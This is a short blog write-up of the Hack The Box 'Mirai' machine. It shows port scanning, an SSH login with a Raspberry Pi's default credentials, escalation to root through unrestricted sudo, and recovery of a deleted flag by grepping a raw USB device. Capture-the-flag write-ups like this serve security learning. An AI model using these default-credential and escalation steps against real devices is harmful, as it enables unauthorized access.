HTB: Mirai


This machine is Mirai from Hack The Box


root@kali:~# nmap -sV -p- -T4
Starting Nmap 7.70 ( ) at 2019-07-07 15:09 EDT
Nmap scan report for
Host is up (0.058s latency).
Not shown: 65529 closed ports
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
53/tcp    open  domain  dnsmasq 2.76
80/tcp    open  http    lighttpd 1.4.35
1831/tcp  open  upnp    Platinum UPnP (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
32469/tcp open  upnp    Platinum UPnP (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 32.24 seconds


I ran dirb against the port 80 server

root@kali:~# dirb

I went to it in browser

Screenshot 1

I tried the default rpi creds over ssh

ssh [email protected]

with password


Which led to

pi@raspberrypi:~ $


pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass,

User pi may run the following commands on localhost:
    (ALL : ALL) ALL

I can already be root

pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home# cd /root
root@raspberrypi:~# ls -la
drwx------  3 root root 4096 Aug 27  2017 .
drwxr-xr-x 35 root root 4096 Aug 14  2017 ..
-rw-------  1 root root  549 Dec 24  2017 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
-rw-r--r--  1 root root   76 Aug 14  2017 root.txt
drwx------  2 root root 4096 Aug 27  2017 .ssh
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Seems like it isn’t done yet then, before digging I took a look for the user flag

root@raspberrypi:/media/usbstick# find / -name user.txt 2>/dev/null
root@raspberrypi:/media/usbstick# cat /home/pi/Desktop/user.txt

Now I look for root

root@raspberrypi:~# cd /media/usbstick/

root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?


Now it is possible to recover some deleted files with grep

root@raspberrypi:/media/usbstick# grep --binary-files=text 'root' --context=100 /dev/sdb > /tmp/root.txt

Check the results

root@raspberrypi:/media/usbstick# cat /tmp/root.txt

There we go

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.